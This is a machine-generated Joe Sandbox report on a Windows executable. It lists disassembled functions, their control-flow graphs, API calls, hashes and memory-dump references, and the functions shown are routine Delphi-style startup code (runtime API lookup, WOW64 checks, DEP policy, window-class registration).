                                                                                                                                                                      control_flow_graph 365 483038-48305d GetModuleHandleA GetProcAddress 366 48305f-483075 GetNativeSystemInfo GetProcAddress 365->366 367 4830c4-4830c9 GetSystemInfo 365->367 368 4830ce-4830d7 366->368 369 483077-483082 GetCurrentProcess 366->369 367->368 370 4830d9-4830dd 368->370 371 4830e7-4830ee 368->371 369->368 378 483084-483088 369->378 372 4830df-4830e3 370->372 373 4830f0-4830f7 370->373 374 483109-48310e 371->374 376 4830f9-483100 372->376 377 4830e5-483102 372->377 373->374 376->374 377->374 378->368 379 48308a-483091 call 4526f0 378->379 379->368 383 483093-4830a0 GetProcAddress 379->383 383->368 384 4830a2-4830b9 GetModuleHandleA GetProcAddress 383->384 384->368 385 4830bb-4830c2 384->385 385->368
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                                                      • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                                                      • API String ID: 2230631259-2623177817
                                                                                                                                                                      • Opcode ID: 4443e2a41c4c54bd691e25b06ef10277586e0033e15251a9b070e4e43abe7fd8
                                                                                                                                                                      • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                                                                                                                                      • Opcode Fuzzy Hash: 4443e2a41c4c54bd691e25b06ef10277586e0033e15251a9b070e4e43abe7fd8
                                                                                                                                                                      • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042386C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                                                                                                                      • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                                                                                                                                      • RegisterClassA.USER32(00499630), ref: 004238AF
                                                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                                                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                                                                                                                                      • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                                                                                                                                      • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                                                                                                                                      • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                                                                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                                                      • String ID: t6B
                                                                                                                                                                      • API String ID: 183575631-3178735703
                                                                                                                                                                      • Opcode ID: eb0856aa3b20557e09ec7a0b3fe99527da8d11aaaee0b603991e5ee89f4b896e
                                                                                                                                                                      • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                                                                                                                                      • Opcode Fuzzy Hash: eb0856aa3b20557e09ec7a0b3fe99527da8d11aaaee0b603991e5ee89f4b896e
                                                                                                                                                                      • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 607 40631c-406336 GetModuleHandleA GetProcAddress 608 406338 607->608 609 40633f-40634c GetProcAddress 607->609 608->609 610 406355-406362 GetProcAddress 609->610 611 40634e 609->611 612 406364-406366 SetProcessDEPPolicy 610->612 613 406368-406369 610->613 611->610 612->613
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                                                                                      • Opcode ID: 62835be78b3351b84d0b1f733bc3142c10ae37590eae9a5e558b8e0258b1a852
                                                                                                                                                                      • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                                                                                      • Opcode Fuzzy Hash: 62835be78b3351b84d0b1f733bc3142c10ae37590eae9a5e558b8e0258b1a852
                                                                                                                                                                      • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00477E04 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 614 477e04-477e2c GetModuleHandleA GetProcAddress 615 477e2e-477e3e call 403738 GetFileAttributesA 614->615 616 477e9a-477e9e call 403494 614->616 615->616 621 477e40-477e42 615->621 619 477ea3-477ead 616->619 622 477e44-477e49 621->622 623 477e4b 621->623 624 477e4d-477e6a call 403738 CreateFileA 622->624 623->624 624->616 627 477e6c-477e85 GetFinalPathNameByHandleA CloseHandle 624->627 627->616 628 477e87-477e8d 627->628 628->616 629 477e8f-477e98 call 477d2c 628->629 629->619
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8,?,?,?,022E2BD8), ref: 00477E60
                                                                                                                                                                      • GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,022E2BD8), ref: 00477E79
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,022E2BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Handle$File$AddressAttributesCloseCreateFinalModuleNamePathProc
                                                                                                                                                                      • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                                                      • API String ID: 873032407-2318956294
                                                                                                                                                                      • Opcode ID: 7443a43b62d54a7b5a6839fcfee0262ee87d3f8fcbaf16db20d16f0fbde85ee6
                                                                                                                                                                      • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                                                                                                                                      • Opcode Fuzzy Hash: 7443a43b62d54a7b5a6839fcfee0262ee87d3f8fcbaf16db20d16f0fbde85ee6
                                                                                                                                                                      • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004531C4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                                                                                      • Opcode ID: b1b2167d1ee662bb81128aa8a457bb2e94950145893f5148b3013454d4187edb
                                                                                                                                                                      • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                                                                                                                                      • Opcode Fuzzy Hash: b1b2167d1ee662bb81128aa8a457bb2e94950145893f5148b3013454d4187edb
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00430938 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                                                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                                                      • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                                                      • API String ID: 4130936913-2943970505
                                                                                                                                                                      • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                                                                                                                      • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                                                                                                                                      • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                                                                                                                      • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00423684 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                                                                                                                      • OemToCharA.USER32(?,?), ref: 00423754
                                                                                                                                                                      • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                      • String ID: 2$MAINICON
                                                                                                                                                                      • API String ID: 3935243913-3181700818
                                                                                                                                                                      • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                                                                                                                      • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                                                                                                                      • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00418F30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                                                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                                                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                                                                                                                                        • Part of subcall function 004230C0: 7406A670.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                                                                                                                        • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                                                                                                                        • Part of subcall function 004230C0: 74074720.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                                                                                                                        • Part of subcall function 004230C0: 7406A580.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                                                                                                                        • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                                                                                                                        • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                                                                                                                        • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                                                                                                                                        • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                                                                                                                        • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                                                                                                                        • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                                                                                                                        • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                                                                                                                        • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                                                                                                                        • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$7406AtomCharCurrentErrorGlobalLoadMode$74074720A580A670EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                                      • API String ID: 1200278916-2767913252
                                                                                                                                                                      • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                                                                                                                      • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00423A7C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 697 423a7c-423a8a 698 423b08-423b0b 697->698 699 423a8c-423a90 697->699 700 423a92-423aac EnumWindows 699->700 701 423b05 699->701 700->701 702 423aae-423acb GetWindow GetWindowLongA 700->702 701->698 703 423ad4-423ade 702->703 704 423acd 702->704 703->701 705 423ae0-423b03 call 40b434 SetWindowPos 703->705 704->703 705->701
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                                                                                                                      • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                                                                                                                      • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
